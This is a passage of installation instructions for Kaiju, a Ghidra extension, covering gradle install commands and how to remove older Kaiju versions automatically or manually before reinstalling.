or if you are unsure if the environment variable is set,

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir> install

Extension files should be copied automatically. Kaiju will be available for use after Ghidra is restarted.

NOTE: Be sure that Ghidra is NOT running before using gradle to install. We are aware of instances when the caching does not appear to update properly if installed while Ghidra is running, leading to some odd bugs. If this happens to you, simply exit Ghidra and try reinstalling again.


Consider Removing Your Old Installation First

It might be helpful to first completely remove any older install of Kaiju before updating to a newer release. We've seen some cases where older versions of Kaiju files get stuck in the cache and cause interesting bugs due to the conflicts. By removing the old install first, you'll ensure a clean re-install and easy use.

The gradle build process now can auto-remove previous installs of Kaiju if you enable this feature. To enable the autoremove, add the "KAIJU_AUTO_REMOVE" property to your install command, such as (assuming the environment variable is probably set as in previous section):

gradle -PKAIJU_AUTO_REMOVE install

If you'd prefer to remove your old installation manually, perform a command like:

rm -rf $GHIDRA_INSTALL_DIR/Extensions/Ghidra/*kaiju*.zip $GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju


Viewing all 5816 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>